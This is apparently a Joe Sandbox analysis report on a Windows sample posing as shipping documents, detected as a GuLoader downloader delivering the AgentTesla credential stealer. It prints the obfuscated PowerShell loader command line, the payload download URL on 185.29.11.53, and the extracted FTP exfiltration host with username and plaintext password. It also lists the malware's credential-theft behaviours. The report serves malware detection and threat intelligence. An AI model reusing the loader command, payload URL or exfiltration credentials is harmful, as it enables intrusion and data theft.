Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping documents 000022999878999800009999.exe

Overview

General Information

Sample name:Shipping documents 000022999878999800009999.exe
Analysis ID:1518330
MD5:4ecafa8f623606caf0a925f5c6b2eb10
SHA1:59cb79183b9547b3915c8aa09ed904f84bcab22c
SHA256:3fe8f843e696c1dacbdcabed38d7132776915d89b60ac10c68fda048cbfe044f
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Shipping documents 000022999878999800009999.exe (PID: 432 cmdline: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe" MD5: 4ECAFA8F623606CAF0A925F5C6B2EB10)
    • powershell.exe (PID: 5008 cmdline: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 4232 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.3376516352.0000000004687000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.2780799795.00000000094D7000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5008, TargetFilename: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)" , CommandLine: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", ParentImage: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe, ParentProcessId: 432, ParentProcessName: Shipping documents 000022999878999800009999.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)" , ProcessId: 5008, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T16:00:07.729876+020028032702Potentially Bad Traffic192.168.2.649720185.29.11.5380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://ftp.concaribe.comAvira URL Cloud: Label: malware
            Found malware configuration
            Source: Shipping documents 000022999878999800009999.exe.432.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exeReversingLabs: Detection: 26%
            Multi AV Scanner detection for submitted file
            Source: Shipping documents 000022999878999800009999.exeReversingLabs: Detection: 26%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Shipping documents 000022999878999800009999.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: Shipping documents 000022999878999800009999.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdbE source: powershell.exe, 00000002.00000002.2775532254.0000000006CDD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbhx source: powershell.exe, 00000002.00000002.2779696439.0000000007FFE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2779696439.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49720 -> 185.29.11.53:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bgJJbKBK219.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bgJJbKBK219.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: wabmig.exe, 00000008.00000002.3393389879.00000000237A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bgJJbKBK219.bin
            Source: wabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bgJJbKBK219.bin-
            Source: wabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bgJJbKBK219.bine
            Source: wabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: powershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2775532254.0000000006C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: wabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Shipping documents 000022999878999800009999.exe, 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Shipping documents 000022999878999800009999.exe, 00000000.00000000.2125866362.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2775532254.0000000006D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micXO
            Source: powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

            System Summary

            barindex
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Shipping documents 000022999878999800009999.exe
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile created: C:\Windows\SysWOW64\sennepssovsenJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00406DC60_2_00406DC6
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_0040759D0_2_0040759D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0424EAE02_2_0424EAE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0424F3B02_2_0424F3B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0424E7982_2_0424E798
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 8_2_0083E3708_2_0083E370
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 8_2_0083AAB08_2_0083AAB0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 8_2_00834A588_2_00834A58
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 8_2_00833E408_2_00833E40
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 8_2_008341888_2_00834188
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 8_2_0083AAAA8_2_0083AAAA
            Source: Shipping documents 000022999878999800009999.exeStatic PE information: invalid certificate
            Source: Shipping documents 000022999878999800009999.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@2/3
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile created: C:\Users\user\AppData\Local\acneformJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1056:120:WilError_03
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile created: C:\Users\user\AppData\Local\Temp\nsx1143.tmpJump to behavior
            Source: Shipping documents 000022999878999800009999.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Shipping documents 000022999878999800009999.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile read: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content 'C:\Users\user\AppData\Local\acneform\Baroco\Tarsometatarsal.Pla';$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
